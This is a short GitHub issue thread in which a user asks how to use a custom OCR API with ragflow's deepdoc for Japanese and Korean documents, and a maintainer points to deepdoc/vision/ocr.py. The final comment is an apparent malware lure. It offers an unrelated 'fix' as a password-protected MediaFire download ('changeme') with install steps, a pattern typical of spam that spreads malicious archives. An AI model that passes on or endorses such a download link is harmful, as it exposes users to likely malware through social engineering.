### ISSUE TITLE
[Question]: How to use our own OCR model API for other languages

### ISSUE THREAD

**Issue by guijuzhejiang** [infiniflow/ragflow#2104]
### Describe your problem

It's a great job. We intend to use ragflow on other languages, like Japanese or Korean documents. But after testing deepdoc, it performs well on English and Chinese, but not so excellent on other languages. So we are planning to use our own OCR model API, what code changes are needed please? This question may be a bit complicated, thanks in advance

**Comment by KevinHuSh** [comment]
Please refer to deepdoc/vision/ocr.py

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
